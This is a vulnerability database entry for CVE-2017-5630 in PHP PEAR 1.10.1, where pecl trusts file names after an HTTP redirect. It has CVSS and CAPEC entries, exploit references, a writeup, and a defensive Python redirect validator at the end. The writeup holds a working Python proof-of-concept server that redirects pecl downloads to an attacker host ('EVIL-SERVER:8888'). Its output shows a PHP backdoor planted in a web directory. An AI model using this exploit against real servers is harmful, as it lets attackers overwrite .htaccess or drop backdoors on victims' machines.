Vulnerabilities > CVE-2017-5630 - Injection vulnerability in PHP Pear 1.10.1

CVSS 5.0 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: NONE
Integrity impact: PARTIAL
Availability impact: NONE

Tags: network, low complexity, php, CWE-74, exploit available

Summary

PECL in the download utility class in the Installer in PEAR Base System v1.10.1 does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.

Vulnerable Configurations

Part         Description  Count
Application  Php          1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Server Side Include (SSI) Injection
    An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
  • Cross Site Scripting through Log Files
    An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.

Exploit-Db

description: PHP PEAR 1.10.1 - Arbitrary File Download. CVE-2017-5630. Webapps exploit for PHP platform
file: exploits/php/webapps/41185.txt
id: EDB-ID:41185
last seen: 2017-01-30
modified: 2017-01-30
platform: php
port:
published: 2017-01-30
reporter: Exploit-DB
source: https://www.exploit-db.com/download/41185/
title: PHP PEAR 1.10.1 - Arbitrary File Download
type: webapps

Packetstorm

data source: https://packetstormsecurity.com/files/download/140796/PEAR-ARBITRARY-FILE-DOWNLOAD.txt
id: PACKETSTORM:140796
last seen: 2017-01-30
published: 2017-01-29
reporter: hyp3rlinx
source: https://packetstormsecurity.com/files/140796/PEAR-Arbitrary-File-Download.html
title: PEAR Arbitrary File Download

Seebug

bulletinFamily: exploit
description:
Author: **mapl0**

### Vulnerability details

The installer in PEAR Base System 1.10.1 does not verify the file type or file name after a redirect, which allows a remote HTTP server to overwrite files on the attacked server (for example .htaccess) via a specially crafted response. The vulnerability is triggered when the victim runs `pecl download`. pear does not rename the invalid file when its name duplicates an existing file name, so the attacker can overwrite the original file or have a backdoor downloaded, provided the pecl request is issued from the web directory. Moreover, pecl does not delete a file obtained this way, which gives the attacker time to brute force the backdoor file before it is noticed.

POC video: https://vimeo.com/201341280

Original version: https://pan.baidu.com/s/1dFaHTxZ (personal recording; the quality is a bit poor)

### Proof of concept

This PoC has three key points. First, the victim issues a `pecl download` request. Then the attacker's server receives the file download request. Finally, a PHP backdoor is obtained by the attacker.

1) The victim server attempts to download a legitimate .tgz file:
   pecl download http://VULN-SERVER:8080/Test.tgz
2) The attacker's server receives the Test.tgz request and replies.
3) pecl unintentionally downloads a malicious PHP backdoor.

On the attacker's server, run:
   python -m SimpleHTTPServer 8888
   python PECL-File-Exploit.py

```python
# PECL-File-Exploit.py (Python 2, as used alongside SimpleHTTPServer above)
import socket

HOST = 'localhost'
PORT = 8080
TARGET = 'http://EVIL-SERVER:8888/'  # attacker's file server
FILE = '.htaccess'                   # file name the client is redirected to

s = socket.socket()
s.bind((HOST, PORT))
s.listen(10)
print 'Waiting for PECL connections...'
while True:
    conn, addr = s.accept()
    junk = conn.recv(512)  # read and discard the pecl request
    # answer every request with a redirect to the attacker-controlled file
    conn.send('HTTP/1.1 302 Found\r\n')
    conn.send('Location: ' + TARGET + FILE + '\r\n')
    conn.close()
s.close()
```

When the attacked server downloads the file:

C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz
downloading Evil.php ...
Starting to download Evil.php (4,665 bytes)
..... done: 4,665 bytes

It leaves the downloaded backdoor in the current directory:

File C:\xampp\htdocs\webapp\Evil.php downloaded

**Personal summary**: the exploitation conditions are harsh: the attacker needs the victim to actively run pecl in the web directory, and the target URL needs to point at the attacker's server. However, if the vulnerability is used for phishing on a social networking site, the danger is still great.

### Disclosure Timeline:

* Vendor Notification: January 11, 2017
* Informed "PECL package no longer maintained" on: January 23, 2017
* Opened Bug #2117: January 25, 2017
* January 29, 2017: Public Disclosure

References: https://www.exploit-db.com/exploits/41185/
id: SSV:92633
last seen: 2017-11-19
modified: 2017-02-01
published: 2017-02-01
reporter: Root
title: PHP PEAR 1.10.1 - arbitrary File Download Vulnerability (CVE-2017-5630)
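The weakness above is that the installer trusts whatever file name the final URL carries after a redirect. As an added defender-side example (not code from the advisory, PEAR or pecl), the following validates the redirect target before anything is written to disk: it re-derives the file name from the final URL, rejects dotfiles such as .htaccess, requires an expected archive suffix, and by default insists the name still matches what was requested. The hosts and the allowed-suffix list are assumptions for illustration.

```python
import posixpath
from urllib.parse import urlsplit, unquote

# Archive types an installer expects to fetch (assumed list, not PEAR's own)
ALLOWED_SUFFIXES = ('.tgz', '.tar', '.tar.gz', '.zip')


def basename_from_url(url):
    """File name component of a URL path, with percent-encoding removed."""
    return posixpath.basename(unquote(urlsplit(url).path))


def validate_redirect_target(requested_url, final_url,
                             allowed_suffixes=ALLOWED_SUFFIXES,
                             require_same_name=True):
    """Return the name that may be written to disk after following a redirect,
    or raise ValueError. All checks run on the *final* URL, which is the step
    the vulnerable installer skipped."""
    final = urlsplit(final_url)
    if final.scheme not in ('http', 'https'):
        raise ValueError('unsupported scheme in redirect: %r' % final.scheme)
    name = basename_from_url(final_url)
    if name in ('', '.', '..') or any(c in name for c in '/\\\0'):
        raise ValueError('no usable file name in redirect target: %r' % name)
    if name.startswith('.'):
        # catches .htaccess, .user.ini and similar server-config dotfiles
        raise ValueError('hidden file rejected: %r' % name)
    if not name.lower().endswith(allowed_suffixes):
        raise ValueError('unexpected file type: %r' % name)
    if require_same_name and name != basename_from_url(requested_url):
        raise ValueError('redirect changed file name: %r -> %r'
                         % (basename_from_url(requested_url), name))
    return name


def is_safe_redirect(requested_url, final_url, **kwargs):
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_redirect_target(requested_url, final_url, **kwargs)
        return True
    except ValueError:
        return False


if __name__ == '__main__':
    # URLs constructed to mirror the advisory's PoC (placeholder hosts)
    req = 'http://VULN-SERVER:8080/Test.tgz'
    for final in ('http://mirror.example/pear/Test.tgz',
                  'http://EVIL-SERVER:8888/.htaccess',
                  'http://EVIL-SERVER:8888/Evil.php'):
        print(final, '->', is_safe_redirect(req, final))
```

A percent-encoded dotfile (`%2Ehtaccess`) is rejected as well, because the name is decoded before the checks run.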